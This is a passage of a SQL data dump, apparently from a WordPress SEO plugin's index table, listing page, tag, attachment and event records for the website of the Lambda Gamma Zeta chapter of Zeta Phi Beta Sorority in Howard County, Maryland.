00:32:03',1,NULL,NULL,NULL,NULL,0,NULL),(11,'https://zphiblgz.org/zhope/zen/','31:64056d1ba6cdc6390e1d172ca87fbbc0',786,'post','page',1,247,NULL,'Lambda Gamma Zeta partners with various elder care facilities in Howard County to provide companionship and fun to the seniors in the community.','Zetas and Elders Engaging','publish',NULL,0,NULL,NULL,NULL,'Elders',31,30,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-28 01:11:59','2021-01-26 21:25:55',1,NULL,NULL,NULL,NULL,1,NULL),(12,'https://zphiblgz.org/lgz-launches-new-college-preparation-workshops/','68:869089023d84bfc982d5db159ebbc491',1243,'post','post',1,0,NULL,NULL,'LGZ Launches New College Preparation Workshops','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2014/12/o-GRADUATION-facebook.jpg',NULL,'577','featured-image',NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2014/12/o-GRADUATION-facebook.jpg','577','featured-image','{\"width\":2000,\"height\":1000,\"url\":\"https://zphiblgz.org/wp-content/uploads/2014/12/o-GRADUATION-facebook.jpg\",\"path\":\"/home2/zphiblgz/public_html/wp-content/uploads/2014/12/o-GRADUATION-facebook.jpg\",\"size\":\"full\",\"id\":577,\"alt\":\"\",\"pixels\":2000000,\"type\":\"image/jpeg\"}',0,NULL,NULL,'2020-09-28 01:14:39','2021-01-26 15:00:39',1,NULL,NULL,NULL,NULL,0,NULL),(13,'https://zphiblgz.org/lgz-celebrates-35-years-service-howard-county-md/','70:736f7fe6a3e48aa04feb4a88e44f28aa',956,'post','post',1,0,NULL,NULL,'LGZ Celebrates 35 Years of Service to Howard County, MD','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2016/12/Proclamatioin3.jpg',NULL,'676','featured-image',NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2016/12/Proclamatioin3.jpg','676','featured-image','{\"width\":1400,\"height\":933,\"url\":\"https://zphiblgz.org/wp-content/uploads/2016/12/Proclamatioin3.jpg\",\"path\":\"/home2/zphiblgz/public_html/wp-content/uploads/2016/12/Proclamatioin3.jpg\",\"size\":\"full\",\"id\":676,\"alt\":\"\",\"pixels\":1306200,\"type\":\"image/jpeg\"}',2,NULL,NULL,'2020-09-28 01:14:39','2021-01-26 15:00:39',1,NULL,NULL,NULL,NULL,0,NULL),(15,'https://zphiblgz.org/tag/prom/','30:76c24a0bd2f6194f19a91e3b463fc322',103,'term','post_tag',NULL,NULL,NULL,NULL,'Prom',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-28 02:14:13','2021-03-16 22:33:04',1,NULL,NULL,NULL,NULL,0,NULL),(16,'https://zphiblgz.org/wp-content/uploads/2017/01/Soror-Conway1.png','65:e81f67bc34231b5b5ff237c16a8c7899',1179,'post','attachment',1,797,NULL,NULL,'Soror Conway1','inherit',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2017/01/Soror-Conway1.png',NULL,'1179','attachment-image',NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2017/01/Soror-Conway1.png','1179','attachment-image','{\"width\":400,\"height\":400,\"url\":\"https://zphiblgz.org/wp-content/uploads/2017/01/Soror-Conway1.png\",\"path\":\"/home2/zphiblgz/public_html/wp-content/uploads/2017/01/Soror-Conway1.png\",\"size\":\"full\",\"id\":1179,\"alt\":\"\",\"pixels\":160000,\"type\":\"image/png\"}',0,NULL,NULL,'2020-09-28 03:37:27','2021-01-27 06:00:33',1,NULL,NULL,NULL,NULL,1,NULL),(17,NULL,NULL,NULL,'system-page','404',NULL,NULL,'Page not found %%sep%% %%sitename%%',NULL,'Error 404: Page not found',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,1,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-09-28 03:53:16','2020-09-28 09:53:16',1,NULL,NULL,NULL,NULL,0,NULL),(18,'https://zphiblgz.org/tag/scholarship/','37:e17e23b8e29c9d88f1362c19dfbf23d0',41,'term','post_tag',NULL,NULL,NULL,NULL,'scholarship',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-28 05:43:21','2021-01-26 21:29:55',1,NULL,NULL,NULL,NULL,0,NULL),(19,'https://zphiblgz.org/tag/money/','31:b4740ed60a53fc13b7936c060f7ef306',13,'term','post_tag',NULL,NULL,NULL,NULL,'money',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-28 09:55:06','2021-01-26 21:29:55',1,NULL,NULL,NULL,NULL,0,NULL),(20,'https://zphiblgz.org/tag/zeta/','30:2ddc6e1dbed4f461bfe3d7130156d546',57,'term','post_tag',NULL,NULL,NULL,NULL,'Zeta',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-28 11:56:52','2021-03-18 13:11:49',1,NULL,NULL,NULL,NULL,0,NULL),(21,'https://zphiblgz.org/tag/denim-and-pearlz-party/','48:a7e0c774b61ca8a92a26654f4ac87cb8',102,'term','post_tag',NULL,NULL,NULL,NULL,'Denim and Pearlz Party',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-28 15:05:53','2021-02-09 21:48:36',1,NULL,NULL,NULL,NULL,0,NULL),(22,'https://zphiblgz.org/tag/zeta-phi-beta/','39:c4b60c0a24673aa6a815188e14ccc001',42,'term','post_tag',NULL,NULL,NULL,NULL,'Zeta Phi Beta',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-28 15:54:39','2021-03-17 12:41:16',1,NULL,NULL,NULL,NULL,0,NULL),(23,'https://zphiblgz.org/tag/women/','31:539b7e72cc84db663359e0758e6bba8e',105,'term','post_tag',NULL,NULL,NULL,NULL,'Women',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-28 15:59:43','2021-03-17 12:48:49',1,NULL,NULL,NULL,NULL,0,NULL),(24,'https://zphiblgz.org/wp-content/uploads/2014/12/LGZPressRelease.png','67:04549ca0c5fac292d2b0b66e24c777e6',682,'post','attachment',1,6,NULL,NULL,'lgzpressrelease','inherit',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2014/12/LGZPressRelease.png',NULL,'682','attachment-image',NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2014/12/LGZPressRelease.png','682','attachment-image','{\"width\":1700,\"height\":2200,\"url\":\"https://zphiblgz.org/wp-content/uploads/2014/12/LGZPressRelease.png\",\"path\":\"/home2/zphiblgz/public_html/wp-content/uploads/2014/12/LGZPressRelease.png\",\"size\":\"full\",\"id\":682,\"alt\":\"\",\"pixels\":3740000,\"type\":\"image/png\"}',0,NULL,NULL,'2020-09-28 16:04:58','2021-02-18 02:16:32',1,NULL,NULL,NULL,NULL,1,NULL),(25,'https://zphiblgz.org/event-categories/appa/','43:a64c330795ae14fad84f638bf0c02ea4',52,'term','event_categories',NULL,NULL,NULL,NULL,'APPA',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-28 21:37:16','2021-03-13 18:15:05',1,NULL,NULL,NULL,NULL,0,NULL),(26,'https://zphiblgz.org/author/lillet/','35:1336414f65d44ec8990536f03a02accd',2,'user',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,'https://secure.gravatar.com/avatar/87d16d2d392195f8c63119a7f7400496?s=500&d=mm&r=g',NULL,NULL,'gravatar-image',NULL,NULL,'https://secure.gravatar.com/avatar/87d16d2d392195f8c63119a7f7400496?s=500&d=mm&r=g',NULL,'gravatar-image',NULL,NULL,NULL,NULL,'2020-09-28 22:06:37','2021-01-27 06:43:49',1,NULL,NULL,NULL,NULL,0,NULL),(27,'https://zphiblgz.org/tag/empowerment/','37:7c0ff2d1cc689c40bc0d1abbcacf688e',106,'term','post_tag',NULL,NULL,NULL,NULL,'Empowerment',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-28 22:18:26','2021-04-01 03:22:01',1,NULL,NULL,NULL,NULL,0,NULL),(28,'https://zphiblgz.org/author/crystalwhitaker/','44:62c237771ffa771aa5d68ef2c2fee4d4',6,'user',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,'https://secure.gravatar.com/avatar/4534349a482467267897958d707fcab7?s=500&d=mm&r=g',NULL,NULL,'gravatar-image',NULL,NULL,'https://secure.gravatar.com/avatar/4534349a482467267897958d707fcab7?s=500&d=mm&r=g',NULL,'gravatar-image',NULL,NULL,NULL,NULL,'2020-09-28 22:23:30','2021-02-22 02:27:33',1,NULL,NULL,NULL,NULL,0,NULL),(29,'https://zphiblgz.org/category/news/','35:113b20a01a031beb98ec79436f56490b',2,'term','category',NULL,NULL,NULL,NULL,'News',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-29 00:07:35','2021-01-27 21:50:28',1,NULL,NULL,NULL,NULL,0,NULL),(30,'https://zphiblgz.org/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','89:634e847b39cf1681d9f752d0a003de28',689,'post','sermon',1,0,NULL,NULL,'Zeta Phi Beta Sorority Inc. Serves Howard County for 35 Years','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO-268x300.png',NULL,NULL,'first-content-image',NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO-268x300.png',NULL,'first-content-image',NULL,2,NULL,NULL,'2020-09-29 00:12:37','2021-01-28 16:38:44',1,NULL,NULL,NULL,NULL,0,NULL),(31,'https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO.png','66:2746b6c535e2f2e5d0159c20617c880e',692,'post','attachment',1,689,NULL,NULL,'finallgz35logo','inherit',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO.png',NULL,'692','attachment-image',NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO.png','692','attachment-image','{\"width\":1580,\"height\":1769,\"url\":\"https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO.png\",\"path\":\"/home2/zphiblgz/public_html/wp-content/uploads/2016/12/FINALLGZ35LOGO.png\",\"size\":\"full\",\"id\":692,\"alt\":\"\",\"pixels\":2795020,\"type\":\"image/png\"}',0,NULL,NULL,'2020-09-29 00:12:37','2021-01-28 16:38:44',1,NULL,NULL,NULL,NULL,1,NULL),(32,'https://zphiblgz.org/tag/wordpress/','35:b9c2864223dac6f889b4b179df9f8b85',22,'term','post_tag',NULL,NULL,NULL,NULL,'wordpress',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-29 04:42:04','2021-03-02 00:49:03',1,NULL,NULL,NULL,NULL,0,NULL),(33,'https://zphiblgz.org/tag/help/','30:c7cf5dd0449f1502c76daff96e75eb39',10,'term','post_tag',NULL,NULL,NULL,NULL,'help',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-29 05:04:53','2021-01-30 11:11:34',1,NULL,NULL,NULL,NULL,0,NULL),(34,'https://zphiblgz.org/tag/howard-county/','39:25727604e676174658c347a45435f910',56,'term','post_tag',NULL,NULL,NULL,NULL,'Howard County',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-29 05:37:59','2021-01-26 21:29:55',1,NULL,NULL,NULL,NULL,0,NULL),(35,'https://zphiblgz.org/wp-content/uploads/2017/01/LGZScholarshipReleaseForm.pdf','77:8e91570f9657002803856d736857d652',1173,'post','attachment',1,797,NULL,NULL,'LGZScholarshipReleaseForm','inherit',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-29 08:26:52','2021-01-27 06:00:12',1,NULL,NULL,NULL,NULL,1,NULL),(36,'https://zphiblgz.org/tag/march-of-dimes/','40:8d9f553156763590e9c0b9353363f133',63,'term','post_tag',NULL,NULL,NULL,NULL,'March of Dimes',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-29 10:46:56','2021-01-30 08:08:38',1,NULL,NULL,NULL,NULL,0,NULL),(37,NULL,NULL,NULL,'system-page','search-result',NULL,NULL,'You searched for %%searchphrase%% %%page%% %%sep%% %%sitename%%',NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,1,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-09-29 13:09:31','2020-09-29 19:09:31',1,NULL,NULL,NULL,NULL,0,NULL),(38,'https://zphiblgz.org/wp-content/uploads/2017/01/Recommendation.png','66:1c39abd9f82c77ed55727ccecb62ccbb',841,'post','attachment',1,797,NULL,NULL,'recommendation','inherit',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2017/01/Recommendation.png',NULL,'841','attachment-image',NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2017/01/Recommendation.png','841','attachment-image','{\"width\":500,\"height\":250,\"url\":\"https://zphiblgz.org/wp-content/uploads/2017/01/Recommendation.png\",\"path\":\"/home2/zphiblgz/public_html/wp-content/uploads/2017/01/Recommendation.png\",\"size\":\"full\",\"id\":841,\"alt\":\"\",\"pixels\":125000,\"type\":\"image/png\"}',0,NULL,NULL,'2020-09-29 21:49:09','2021-02-17 18:35:14',1,NULL,NULL,NULL,NULL,1,NULL),(39,'https://zphiblgz.org/event-categories/charity-events/','53:07744891d1710d5667441c9ab9e31282',23,'term','event_categories',NULL,NULL,NULL,NULL,'Charity events',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-30 03:43:23','2021-01-26 21:29:55',1,NULL,NULL,NULL,NULL,0,NULL),(40,'https://zphiblgz.org/tag/appa/','30:15e096a316cdf0ce2fc51c50aaae72e1',104,'term','post_tag',NULL,NULL,NULL,NULL,'APPA',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-30 05:35:25','2021-03-02 05:46:31',1,NULL,NULL,NULL,NULL,0,NULL),(41,'https://zphiblgz.org/tag/donate/','32:6321c21bcf99e5d95b71e89e378cc672',8,'term','post_tag',NULL,NULL,NULL,NULL,'donate',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-30 11:31:19','2021-03-21 10:10:39',1,NULL,NULL,NULL,NULL,0,NULL),(42,'https://zphiblgz.org/cause/march-of-dimes/','42:357ddac44c9b69b323965c7383f455d2',1023,'post','cause',1,0,NULL,NULL,'March of Dimes','publish',NULL,0,NULL,NULL,NULL,'March of Dimes',18,30,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-30 13:26:06','2021-02-13 20:46:53',1,NULL,NULL,NULL,NULL,0,NULL),(43,'https://zphiblgz.org/cause/scholarship/','39:bfda9b47820293128d7ab73d5931a81d',59,'post','cause',1,0,NULL,NULL,'W. Ruth Conway Scholarship Fund','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-30 13:56:28','2021-01-27 21:04:34',1,NULL,NULL,NULL,NULL,0,NULL),(44,'https://zphiblgz.org/cause/marchofdimes-2/','42:c93e713b1fe166aab87dced9de3de5e2',90,'post','cause',1,0,NULL,NULL,'March of Dimes','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-30 14:04:44','2021-01-28 05:09:15',1,NULL,NULL,NULL,NULL,0,NULL),(45,'https://zphiblgz.org/event-categories/youth/','44:2b4a1efc6ded00a8ebd04ced2303b927',43,'term','event_categories',NULL,NULL,NULL,NULL,'Youth',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-30 14:11:24','2021-01-26 21:29:55',1,NULL,NULL,NULL,NULL,0,NULL),(46,'https://zphiblgz.org/ts_slider/567/','35:27871b5ab8a157836ffc0d872053bd78',567,'post','ts_slider',1,0,NULL,NULL,'Main Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-09-30 16:07:59','2021-01-28 17:01:24',1,NULL,NULL,NULL,NULL,0,NULL),(47,'https://zphiblgz.org/event-categories/scholarship/','50:552e37ed295e6ee53b46288bcddad216',55,'term','event_categories',NULL,NULL,NULL,NULL,'Scholarship',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-10-01 02:41:07','2021-01-26 21:29:55',1,NULL,NULL,NULL,NULL,0,NULL),(48,'https://zphiblgz.org/tag/cause/','31:c354a478c8b82338bd95947445d6f8a7',4,'term','post_tag',NULL,NULL,NULL,NULL,'cause',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-10-02 01:52:38','2021-02-26 12:54:10',1,NULL,NULL,NULL,NULL,0,NULL),(49,'https://zphiblgz.org/wp-content/uploads/2016/12/Membership.png','62:bb75da4d3be75f40a010e1c05f21e5f0',576,'post','attachment',1,0,NULL,NULL,'membership','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2016/12/Membership.png',NULL,'576','attachment-image',NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2016/12/Membership.png','576','attachment-image','{\"width\":2829,\"height\":1591,\"url\":\"https://zphiblgz.org/wp-content/uploads/2016/12/Membership.png\",\"path\":\"/home2/zphiblgz/public_html/wp-content/uploads/2016/12/Membership.png\",\"size\":\"full\",\"id\":576,\"alt\":\"\",\"pixels\":4500939,\"type\":\"image/png\"}',0,NULL,NULL,'2020-10-03 11:52:45','2021-01-28 15:08:42',1,NULL,NULL,NULL,NULL,0,NULL),(50,'https://zphiblgz.org/author/lgz_president/','42:c907bb3b2c7ad1684e307ced4e1111ea',7,'user',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,'https://secure.gravatar.com/avatar/64e68e486fed314092fc95215a56eb55?s=500&d=mm&r=g',NULL,NULL,'gravatar-image',NULL,NULL,'https://secure.gravatar.com/avatar/64e68e486fed314092fc95215a56eb55?s=500&d=mm&r=g',NULL,'gravatar-image',NULL,NULL,NULL,NULL,'2020-10-05 04:45:34','2021-03-18 16:14:26',1,NULL,NULL,NULL,NULL,0,NULL),(51,'https://zphiblgz.org/event-categories/bog/','42:c11579d653d06d41ee0b7a35f928dd5d',51,'term','event_categories',NULL,NULL,NULL,NULL,'BOG',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-10-06 20:37:27','2021-01-26 21:29:55',1,NULL,NULL,NULL,NULL,0,NULL),(52,NULL,NULL,1,'term','category',NULL,NULL,NULL,NULL,'Uncategorized',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-10-11 12:06:00','2021-01-26 08:00:12',1,NULL,NULL,NULL,NULL,0,NULL),(53,'https://zphiblgz.org/event-categories/community-service/','56:69577d0eb7e0113a369d24fe008f972d',44,'term','event_categories',NULL,NULL,NULL,NULL,'Community Service',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-10-16 09:10:50','2021-01-26 21:29:55',1,NULL,NULL,NULL,NULL,0,NULL),(54,'https://zphiblgz.org/wp-content/uploads/2018/05/Chapter.png','59:ac5590d653d0813f5d933e9dddde8f5f',1277,'post','attachment',1,0,NULL,NULL,'Chapter','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2018/05/Chapter.png',NULL,'1277','attachment-image',NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2018/05/Chapter.png','1277','attachment-image','{\"width\":1400,\"height\":933,\"url\":\"https://zphiblgz.org/wp-content/uploads/2018/05/Chapter.png\",\"path\":\"/home2/zphiblgz/public_html/wp-content/uploads/2018/05/Chapter.png\",\"size\":\"full\",\"id\":1277,\"alt\":\"\",\"pixels\":1306200,\"type\":\"image/png\"}',0,NULL,NULL,'2020-11-04 18:49:04','2021-04-09 23:25:21',1,NULL,NULL,NULL,NULL,0,NULL),(55,'https://zphiblgz.org/event-categories/membership/','49:6334c58a4b2d4be9651395d84208a76f',69,'term','event_categories',NULL,NULL,NULL,NULL,'Membership',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-08 15:14:22','2021-02-18 05:08:32',1,NULL,NULL,NULL,NULL,0,NULL),(56,NULL,NULL,694,'post','attachment',1,190,NULL,NULL,'15355599_1266335763427202_8553129621538361413_n','inherit',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2014/12/15355599_1266335763427202_8553129621538361413_n.jpg',NULL,'694','attachment-image',NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2014/12/15355599_1266335763427202_8553129621538361413_n.jpg','694','attachment-image','{\"width\":960,\"height\":669,\"url\":\"https://zphiblgz.org/wp-content/uploads/2014/12/15355599_1266335763427202_8553129621538361413_n.jpg\",\"path\":\"/home2/zphiblgz/public_html/wp-content/uploads/2014/12/15355599_1266335763427202_8553129621538361413_n.jpg\",\"size\":\"full\",\"id\":694,\"alt\":\"\",\"pixels\":642240,\"type\":\"image/jpeg\"}',0,NULL,NULL,'2020-12-03 00:10:44','2021-01-26 08:00:12',1,NULL,NULL,NULL,NULL,1,NULL),(57,'https://zphiblgz.org/event-categories/community-event/','54:7475315bbb0d5a292f8fc64c32bdca90',70,'term','event_categories',NULL,NULL,NULL,NULL,'Community Event',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 03:52:35','2021-01-26 21:29:55',1,NULL,NULL,NULL,NULL,1,NULL),(58,'https://zphiblgz.org/tag/premature/','35:b428e3892e221e0cb7e4cd8b6213296a',66,'term','post_tag',NULL,NULL,NULL,NULL,'Premature',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-29 08:12:05','2021-02-20 19:37:20',1,NULL,NULL,NULL,NULL,0,NULL),(60,'https://zphiblgz.org/','21:809b484791d5380447624536ebc76981',NULL,'home-page',NULL,NULL,NULL,'%%sitename%% %%page%% %%sep%% %%sitedesc%%','Lambda Gamma Zeta of Howard County','Home',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,'','','','',NULL,NULL,NULL,1,NULL,'2021-01-26 08:10:46','2021-09-22 18:25:04',1,NULL,NULL,NULL,NULL,0,NULL),(62,'https://zphiblgz.org/?post_type=event&p=1390','44:ddd35177bffd59c6c5bd5f5f8e0f4c01',1390,'post','event',2,0,NULL,NULL,'Youth Open House','draft',0,0,NULL,NULL,NULL,NULL,NULL,60,0,NULL,0,NULL,NULL,NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2020/07/LGZ_YouthOpenHouse2020-finalsmall-e1594225078306.png',NULL,'1395','featured-image',NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2020/07/LGZ_YouthOpenHouse2020-finalsmall-e1594225078306.png','1395','featured-image','{\"width\":155,\"height\":200,\"url\":\"https://zphiblgz.org/wp-content/uploads/2020/07/LGZ_YouthOpenHouse2020-finalsmall-e1594225078306.png\",\"path\":\"/home2/zphiblgz/public_html/wp-content/uploads/2020/07/LGZ_YouthOpenHouse2020-finalsmall-e1594225078306.png\",\"size\":\"full\",\"id\":1395,\"alt\":\"\",\"pixels\":31000,\"type\":\"image/png\"}',0,NULL,NULL,'2021-01-26 14:29:55','2021-01-27 06:43:49',1,NULL,NULL,NULL,NULL,0,NULL),(63,'https://zphiblgz.org/?post_type=event&p=493','43:7ec9c1f8db300018ac8ce4210c842a07',493,'post','event',1,0,NULL,NULL,'Breakfast on the 